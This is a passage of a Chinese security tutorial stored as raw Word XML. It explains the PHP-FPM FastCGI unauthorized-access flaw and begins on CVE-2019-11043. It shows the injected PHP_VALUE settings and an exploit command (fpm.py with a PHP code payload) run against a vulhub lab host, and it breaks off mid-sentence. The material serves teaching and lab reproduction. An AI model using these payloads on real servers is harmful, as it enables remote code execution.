    <w:p w14:paraId="311D409D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Wrapper：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A44841A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字母意思是包装的意思，包装的是谁呢？包装的是FastCGI，通过FastCGI接口，Wrapper接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CB4B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收到请求后，会生成一个新的线程调用PHP解释器来处理数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD66BC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0D5B121E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也就是说，fastcgi作为一种</w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:tgtFrame="https://blog.csdn.net/qq_55316925/article/details/_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>通信协议</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。提供了nginx程序和php-fpm通信的桥梁。作为一种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2B7E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规范，保障了服务器接收到的php请求可以完整快速的传递到php-fpm魔模块中进行处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5084F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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>详解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>：https://blog.csdn.net/qq_55316925/article/details/128974535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247C82F6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7.1 PHP-FPM Fastcgi 未授权访问漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8DD0D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原理详解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0512B6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不当配置的php-fpm导致安全漏洞。如果fastcgi_pass指令错误地设置为 0.0.0.0，就会致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABCBE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使FastCGI接口暴露于公网中，允许任何网络用户向php-fpm 发送FastCGI 协议数据。这种配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA131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不当可能被利用来修改 php.ini 配置文件，从而引发远程代码执行攻击。值得注意的是，此漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B3FB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影响所有版本的PHP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847E13D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原理简介：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898BCE0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到了漏洞成因这一块呢还是十分清晰的，既然是未授权访问那肯定少不了0.0.0.0：9000这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56929D7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一条配置了。就是因为管理员在配置时，错误的将php-fpm的9000端口访问限制配置成了允许所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AEB72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有IP访问。造成没授权的人也能访问这个端口。为别有用心的攻击者提供了攻击的切入点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4B7AC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利用条件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF701E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1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php-fpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastcgi_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18119CA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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、可以与目标服务器通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>暴露在公网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B40F1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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、目标服务器有可访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4677B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利用过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2D07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利用fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>接口向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php-fpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">发送恶意配置 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49337B8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color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'PHP_VALUE'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'auto_prepend_file = php://input'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5715F8C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AA1111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AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'PHP_ADMIN_VALUE'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">'allow_url_include = On' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4C56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color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>auto_prepend_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944D5B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加载任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件前，先加载配置内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 伪协议需要将如下配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C8495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开启：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'allow_url_include = On'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB17A52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访问目标中某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件，触发配置规则，若目标服务器根目录下没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件，则可以访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE8A2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/usr/local/lib/php/PEAR.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>自带文件，可以直接访问该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F70FB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然后发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php-fpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php-fpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SCRIPT_FILENAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">值转发给 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解析，更</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C231B5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改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置，然后执行文件或代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DC274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漏洞复现：vulhub靶场启动环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCA13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在另一台PCKali2023虚拟机上直接使用该漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EXP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4422B36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工具执行指令：在对应目录执行此工具指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0249FF4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Cs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">python3 fpm.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/lib/php/PEAR.php -c '&lt;?php echo `id`;exit;?&gt;' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3978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获取ID成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F698B49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 xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fastcgi_nginx_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PHP-FPM 远程代码执行漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2019-11043）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F114D8D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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D918DA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使用某些特定配置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx + PHP-FPM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器存在的漏洞，允许远程执行代码。该漏洞需要在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B3C2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nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中进行特定配置才能触发，因配置不当，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastcgi_split_path_info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块在处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525ED57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理带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的请求时，对换行符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> \n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">处置不当使得将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PATH_INFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 值置为空，从而导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> php-fpm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B31274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在处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PATH_INFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时存在漏洞，攻击者通过精心的构造和利用，可以导致远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BBB258" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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</w:p>
    <w:p w14:paraId="06B5A99F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 xml:space="preserve">具体配置如下： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238EF7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 xml:space="preserve">location ~ [^/]\.php(/|$) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D474C4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 xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345DB1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 xml:space="preserve">fastcgi_split_path_info ^(.+?\.php)(/.*)$; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2108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 xml:space="preserve">fastcgi_param PATH_INFO $fastcgi_path_info; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56705CA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 xml:space="preserve">fastcgi_pass   php:9000; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FAEF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 xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C07FEF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 xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD1D46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黑客可用换行符％</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来破坏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fastcgi_split_path_info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指令中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Regexp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Regexp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
